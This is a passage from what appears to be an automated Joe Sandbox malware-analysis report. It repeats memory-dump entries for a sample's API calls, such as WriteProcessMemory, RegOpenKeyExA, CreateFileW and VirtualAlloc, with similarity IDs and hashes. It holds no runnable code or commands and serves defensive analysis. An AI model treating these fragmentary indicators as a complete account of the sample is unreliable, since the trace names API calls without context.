                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 00D9052E
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 00D91114
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 1d645604c1a1c404572dfb6f431631895a4ee39c39789d6fee0d256497b66a6b
                    • Instruction ID: d9cb45078ba021de41019296a5f5f288c8d02c1ab7a32d13fd258b09b6ab9983
                    • Opcode Fuzzy Hash: 1d645604c1a1c404572dfb6f431631895a4ee39c39789d6fee0d256497b66a6b
                    • Instruction Fuzzy Hash: CA419B76A14201DDEF01DBA5BD42F3D7EA9FB81308F29D119A0879B163DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 0d28287d4a7922abe7909f51270f5554bb3293ed60572856a366e73dcb79f7c4
                    • Instruction ID: 38d2dbbc1ed05fac4d44c893b61258dae591e3d28f15f343b99b616b9d9f8571
                    • Opcode Fuzzy Hash: 0d28287d4a7922abe7909f51270f5554bb3293ed60572856a366e73dcb79f7c4
                    • Instruction Fuzzy Hash: 71315B25629502EDFF2A63F5BC12E3A2D4EFB81B15F28D91DB183D9483ED38D9016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: b4c3bc4f3a09729fe90bf56ebf48325c39a14f480c1811398c4fdfe6c6f78867
                    • Instruction ID: 0470c8c143c4c7239a48c605c5792bc51e41b1936007f9634f141c7b390a903e
                    • Opcode Fuzzy Hash: b4c3bc4f3a09729fe90bf56ebf48325c39a14f480c1811398c4fdfe6c6f78867
                    • Instruction Fuzzy Hash: 2E414B32A14205CEDF15DBA8FC81F2D7E99FB90308F25D625D043DB166DEB4C94096B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 78c4ce668bc14a0a7c077f3898c933bbd72d75491040a00ab9aa3b05715fdd6e
                    • Instruction ID: 77c4e1be8d760dac6e1dd50e01145ab38c4ccdab62151fdda7dbf78c17645ce1
                    • Opcode Fuzzy Hash: 78c4ce668bc14a0a7c077f3898c933bbd72d75491040a00ab9aa3b05715fdd6e
                    • Instruction Fuzzy Hash: 00310C25B28502ADFF6967F5BC12E3A2C4AFB81B15F18991DB183D9487ED38D6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 6c812450da667ef91aa4bc36ec31cf22562c813e5ce016a74f244c84a4aabfb6
                    • Instruction ID: a9322da2016e12222d9ec0df39daad911706db87c8233b39fbfd009ef887c0c4
                    • Opcode Fuzzy Hash: 6c812450da667ef91aa4bc36ec31cf22562c813e5ce016a74f244c84a4aabfb6
                    • Instruction Fuzzy Hash: 51313B25B28502ADFF2977F5BC12E3E2C4EFB81B11F24991DB183D9486EE38D6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 69810937cf8dd6d7afae2f3226f39df04c8055b5bb7d317543c1862063685c98
                    • Instruction ID: 49397f8e8b6222508baacf393795515fc9f7ce526907d95f661616de27ff6044
                    • Opcode Fuzzy Hash: 69810937cf8dd6d7afae2f3226f39df04c8055b5bb7d317543c1862063685c98
                    • Instruction Fuzzy Hash: BA417776A14305DDEF05DBA4AD41B3D7EAAFB80308F25E11990479B162DE7489019AB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 5c7978ccfa3aab9bb2358254a7b511aeb87a74bc646464c4e8df82c8fd74f9c4
                    • Instruction ID: 69862e08cdcbb8939f1db37ad13f3ca6bcf1b5276d7a00b23a1dd21a724f27f5
                    • Opcode Fuzzy Hash: 5c7978ccfa3aab9bb2358254a7b511aeb87a74bc646464c4e8df82c8fd74f9c4
                    • Instruction Fuzzy Hash: F4317876914305CDDF05DFA4AD81B2CBEAAFB80308F25D119D0879F1A2DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: b8e8fb016d8de286ceab7fcc401d983151fd6e590f9a097f5807e2646bb6db09
                    • Instruction ID: ed535cca892dabda9d5c4372d487b6a9dd6c72853e0e08c834972bc64ff7d020
                    • Opcode Fuzzy Hash: b8e8fb016d8de286ceab7fcc401d983151fd6e590f9a097f5807e2646bb6db09
                    • Instruction Fuzzy Hash: F2316776904305CEDF05DFA4AD81B2DBEA9FB80308F25E119D087AF1A2DE74C9019BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 41728e643d91c63cc06e9eb38a5aa92b4827d6ea1a926a6d512a1ea13076a8ea
                    • Instruction ID: 41c3ef6614c3489348b7219229474e30af9f3be2a395b30e5a67e571d56126c6
                    • Opcode Fuzzy Hash: 41728e643d91c63cc06e9eb38a5aa92b4827d6ea1a926a6d512a1ea13076a8ea
                    • Instruction Fuzzy Hash: 65214E35A28502DDEF2D67F4FC12A392D49FB80B11F18D91DB183D9492EE38D5016471
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3f3c0cb22216bc1d4d37d73cb1b76a3ec2d58828a5ea3753d9766b42e69312e0
                    • Instruction ID: b2d5b57393c163180fd10e35c8d16b6cdc9d0906d030a4136d5c931f437bbde9
                    • Opcode Fuzzy Hash: 3f3c0cb22216bc1d4d37d73cb1b76a3ec2d58828a5ea3753d9766b42e69312e0
                    • Instruction Fuzzy Hash: 1E212C25628502EDEF6E67F4BC12A3A1C89FB80B55F28DD1DB183D9482ED39D6016471
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 71561392d4d8067ff90444031261ce5e75ba335fe1b5180300fa67dc93fbc04b
                    • Instruction ID: abf345a516701ae5c58efc637a2e44c4bd6c06d580ef4261649350f5b27697f0
                    • Opcode Fuzzy Hash: 71561392d4d8067ff90444031261ce5e75ba335fe1b5180300fa67dc93fbc04b
                    • Instruction Fuzzy Hash: 94318572A04205CEDF01DFA4AC81E2DBEA9FB8030CF69D114D0879B162DEB4890197B0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 5a9244b7db617b6d444f9f4c58634c16109b38a375df11579253416b8934bc97
                    • Instruction ID: e5e85f6841d347a1ca7a5045275214999b672f27f0c8837d291dd576154599e9
                    • Opcode Fuzzy Hash: 5a9244b7db617b6d444f9f4c58634c16109b38a375df11579253416b8934bc97
                    • Instruction Fuzzy Hash: AF215B26629502EDEF2A67F4BC12A3D1D49FB81715B28DD1DB183D9493ED38D601A072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 743db1ef30ed4ad0898f61bb3235822ef16331a2eca99231dc703896e40b9f58
                    • Instruction ID: 9650e7321e8765dcb3014b0802458d96548d750f6778e9a02fa067b902165c23
                    • Opcode Fuzzy Hash: 743db1ef30ed4ad0898f61bb3235822ef16331a2eca99231dc703896e40b9f58
                    • Instruction Fuzzy Hash: CC216871905205CEDF01DFA4A981E2DBFA9FB8130CF29D215D0879B1A6DAB4890197B0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: fedd77173f0f68c5afddafd12f9c380183e137179cf39233f9161bd744f89064
                    • Instruction ID: 8ab50cf5e1a1ba06f229f481601fc32b4743b798b53649de78c8b33ed79ef312
                    • Opcode Fuzzy Hash: fedd77173f0f68c5afddafd12f9c380183e137179cf39233f9161bd744f89064
                    • Instruction Fuzzy Hash: A9210A25A28502ADEF6967F5BC12A3A1C49FB81715B28AD1DB183D9487ED38C6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 51de3e645f225c32ace66936091dc14c7e19af588d1765a9ff836c4638613e73
                    • Instruction ID: b04d7303dca7adffef9b421cac983a69b0a394c1e3b1ef29036fb50edc07accc
                    • Opcode Fuzzy Hash: 51de3e645f225c32ace66936091dc14c7e19af588d1765a9ff836c4638613e73
                    • Instruction Fuzzy Hash: C4219B72900205CEDF01DFA4ED81E6DBEAAFB8030CF29D115D0479F166DEB4890097B0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: a4ddb456e16d676d7ddad0bf632ab18ea0a3fab2c526f2f4fad18b46aefe225a
                    • Instruction ID: 5d8d7b9786d79f4ba938c250b0a2857ccf14c731682750d917f9be994c728a1e
                    • Opcode Fuzzy Hash: a4ddb456e16d676d7ddad0bf632ab18ea0a3fab2c526f2f4fad18b46aefe225a
                    • Instruction Fuzzy Hash: B5112B26A28502DDEF6D77F5BC12A3E1C4EFB80715B24AD1EB183D9486EE38C6016072
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 64bc72617dbddc16c178752d2fe5edcb444676b1f65a233cf60c070721219435
                    • Instruction ID: ace27bdd77f5129b5e23b1fc2af254b4db3f91f4500f2fa8c04b2e78d78a583a
                    • Opcode Fuzzy Hash: 64bc72617dbddc16c178752d2fe5edcb444676b1f65a233cf60c070721219435
                    • Instruction Fuzzy Hash: 55216572900205CEDF01DFA4E981E6DBEAAFB8030CF29D215D0479F266CFB489009BB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 091725af6dc5df62dc5a8191f0c2cc866ed3c675b6e12344e4e2024a4dce6300
                    • Instruction ID: da12785690c4432bb05d78fa81d885818d1b60cd0efc2cb767bbfb8208f01f04
                    • Opcode Fuzzy Hash: 091725af6dc5df62dc5a8191f0c2cc866ed3c675b6e12344e4e2024a4dce6300
                    • Instruction Fuzzy Hash: 58110C216285029DEF2D66F4BC1363D1D4AEB80B15F24DD2EB183D94D6DD38C6015031
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 3588f5e52ec049507abf0ce877314021c8aeaa653e7a2efcab5abb77f58e6a66
                    • Instruction ID: 58c885a76ad0046d88862ab773e1d4618b014c56f51197baf9d5e8132e9ad08f
                    • Opcode Fuzzy Hash: 3588f5e52ec049507abf0ce877314021c8aeaa653e7a2efcab5abb77f58e6a66
                    • Instruction Fuzzy Hash: 4A11293CE14217EEEF2A5BA08C06F7D6969FB91741F3D9049F08395041FE358A426A75
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 85be102351366d93fe2279f64feb52b65cf98c892d2e949f85ed22989106f610
                    • Instruction ID: 70079a861d191f9c611fb17eb5b7e47874f7c091e0e437e14c41c526d552447e
                    • Opcode Fuzzy Hash: 85be102351366d93fe2279f64feb52b65cf98c892d2e949f85ed22989106f610
